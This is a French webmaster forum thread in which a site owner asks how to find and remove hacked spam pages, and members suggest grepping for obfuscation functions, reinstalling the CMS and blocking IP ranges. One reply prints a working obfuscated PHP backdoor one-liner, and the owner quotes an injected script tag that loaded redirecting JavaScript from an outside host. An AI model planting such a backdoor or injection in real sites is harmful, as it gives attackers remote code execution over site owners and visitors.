Site hacké, pages invisibles

Discussion dans 'Problèmes de référencement spécifiques à vos sites' créé par amrani13, 8 Juillet 2015.

  1. amrani13

    amrani13 WRInaute occasionnel

    Inscrit:
    18 Octobre 2011
    Messages:
    450
    J'aime reçus:
    0
    Bonjour,

    Je me permets de poster ici car je n'ai pas trouvé de rubrique plus adéquate.

    Mon site s'est fait hacké depuis 1 mois ou plus, des intrus ont crées des pages mais je parviens pas à les trouver sur le ftp pour les supprimer ...

    j'ai vraiment tout fouillé du coup je me demande comment ont ils pu faire ?

    Voici quelques exemples de pages :
    -http://smartphonx.fr/paid-web-hosting
    -http://smartphonx.fr/namecheap-discount-coupons
    -http://smartphonx.fr/sweden-vps
    -http://smartphonx.fr/dedicated-server-florida

    Il y en a une bonne vingtaine, en plus elles sont linkés et visités. Est ce que ca peut proser un problème niveau seo (pour le moment rien remarqué) ?



    Merci pour votre aide
     
  2. loubet

    loubet WRInaute impliqué

    Inscrit:
    19 Février 2003
    Messages:
    871
    J'aime reçus:
    0
    le fichier .htaccess a-t-il été modifié ?
     
  3. amrani13

    amrani13 WRInaute occasionnel

    Inscrit:
    18 Octobre 2011
    Messages:
    450
    J'aime reçus:
    0
    J'avais trouvé ce code que j'ai viré depuis (je sais pas si c'est lié)

    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule>
     
  4. spout

    spout WRInaute accro

    Inscrit:
    14 Mai 2003
    Messages:
    8 665
    J'aime reçus:
    2
    Cherche dans tout ton WP: eval(), base64_decode(), gzinflate(), str_rot13()
    Les URLs hackées sont servies via du PHP.
     
  5. madri2

    madri2 WRInaute impliqué

    Inscrit:
    29 Décembre 2007
    Messages:
    837
    J'aime reçus:
    0
    un backdoor peut se cacher sans qu'il n'y ait de eval ou autre
    il est impossible de trouver un backdoor uniquement en faisant une recherche

    si c'est un cms, vaut mieux le réinstaller (dans un nouveau dossier), et sinon faut vérifier chaque fichier php un par un qu'il ne contient pas de code pas original
     
  6. amrani13

    amrani13 WRInaute occasionnel

    Inscrit:
    18 Octobre 2011
    Messages:
    450
    J'aime reçus:
    0
    merci pour vos réponses, il s'agit de quels fichiers ? eval(), base64_decode(), gzinflate(), str_rot13()
     
  7. amrani13

    amrani13 WRInaute occasionnel

    Inscrit:
    18 Octobre 2011
    Messages:
    450
    J'aime reçus:
    0
    ca va demandé du boulot mais je ne pense pas avoir le choix
     
  8. madri2

    madri2 WRInaute impliqué

    Inscrit:
    29 Décembre 2007
    Messages:
    837
    J'aime reçus:
    0
    si c'est un cms, faut vérifier chaque thème et plugin, s'il est à jour et s'il existe toujours (s'il a été supprimé c'est pas bon singe)
     
  9. amrani13

    amrani13 WRInaute occasionnel

    Inscrit:
    18 Octobre 2011
    Messages:
    450
    J'aime reçus:
    0
    J'avais aussi un problème avec un site du meme serveur, le code suivant avait été ajouté dans le header :

    <script type='text/javascript' src="http://gccanada.com/jquery.js"></script>
    <script type='text/javascript' src="http://gccanada.com/jquery.js"></script>

    Ca généré une redirection de tous les internautes vers 2 ou 3 sites étranger et parfois meme vers google ...
     
  10. spout

    spout WRInaute accro

    Inscrit:
    14 Mai 2003
    Messages:
    8 665
    J'aime reçus:
    2
    Oui mais dans son cas, ses pages piratées sont bien servies par PHP. Un grep ça prend même pas 30 sec..., autant essayer ça en premier.
     
  11. madri2

    madri2 WRInaute impliqué

    Inscrit:
    29 Décembre 2007
    Messages:
    837
    J'aime reçus:
    0
    sauf que grep n'est pas suffisant comme j'ai dit
     
  12. madri2

    madri2 WRInaute impliqué

    Inscrit:
    29 Décembre 2007
    Messages:
    837
    J'aime reçus:
    0
    pour info, voici un backdoor :
    <?php $k="ass"."ert"; $k(${"_PO"."ST"} ['yt']);?>
     
  13. amrani13

    amrani13 WRInaute occasionnel

    Inscrit:
    18 Octobre 2011
    Messages:
    450
    J'aime reçus:
    0
    Pour info c'est quoi un grep ?
     
  14. ybet

    ybet WRInaute accro

    Inscrit:
    22 Novembre 2003
    Messages:
    9 059
    J'aime reçus:
    0
    Forcément que tu ne les trouve pas en FTP puisque tu utilise un CMS: ils sont simplement repris dans les tables MySQL.

    Ces BROL de CMS: facile à installer, facile à configurer, facile à paramétrer, facile à mettre à jour et ... facile à pirater quand ils ne sont pas mis à jour.

    Une solution est effectivement de réinstaller complètement le site (à condition d'avoir une sauvegarde sur ton PC de la base de donnée et des différents fichiers). Pourtant, si un pirateur est passé: la faille existe encore -> retransfert et MISE à JOUR.
    2. analyse via les logs du serveur / hébergement à la date du piratage pour comprendre d'où ca vient: IP et fichiers attaqués. -> interdiction de la plage IP qui a créé le problème par htaccess ou (serveur) IPtable.

    Comme technicien informatique: quand un PC se prend des bestioles, je vérifie manuellement les programmes bizarres installés, quand ca me paraît un peu plus étrange: utilisation de logiciels spécialisés et quand je doute -> réinstall du PC. C'est la même chose pour un hébergement: en cas de doute -> réinstall. (j'ai la chance de ne pas utiliser de CMS mais aussi de bloquer tout ce qui ne me semble pas catholique .... : un jour j'en ais eut mare des bricoleurs).

    Dans ton cas: pour essayer de corriger tu va devoir vérifier quasiment tous les fichiers maîtres ... index, catégorises, articles. Tous les fichiers (pardon contenu de tables) contenu. Tous les fichiers de navigation ... (de nouveau contenu des tables) .... Suis plutôt doué pour les bestioles mais manuellement, c'est quasiment impossible.

    et ouvrent d'autres portes à d'autres bestioles. Et si tu as déjà trouver le site gccanada BLOQUE tous les accès par htaccess à partir de ce site.
    Par contre, ce qui est génial: trouver un antivirus (même payant) pour LINUX ... impossible. Le monde "libre" est tellement persuadé qu'ils n'ont pas de risques :roll:

    Reste à comprendre (comment interdire une plage de serveurs parasites): adresse du site 209.237.151.17 Hébergeur américain Hypersurf Internet Services, Inc (USA) site: -hypersurf.com avec plage d'adresse 209.237.0.0 - 209.237.63.255 Encore un hébergeur à supprimer. CIDR: 209.237.0.0/18
    en htaccess:
    Deny from 209.237.0.0/18
    en IPTABLE: iptables -I INPUT -s 209.237.0.0/18 -j DROP
     
  15. spout

    spout WRInaute accro

    Inscrit:
    14 Mai 2003
    Messages:
    8 665
    J'aime reçus:
    2
    8h plus tard et tjs pas trouvé ? 8O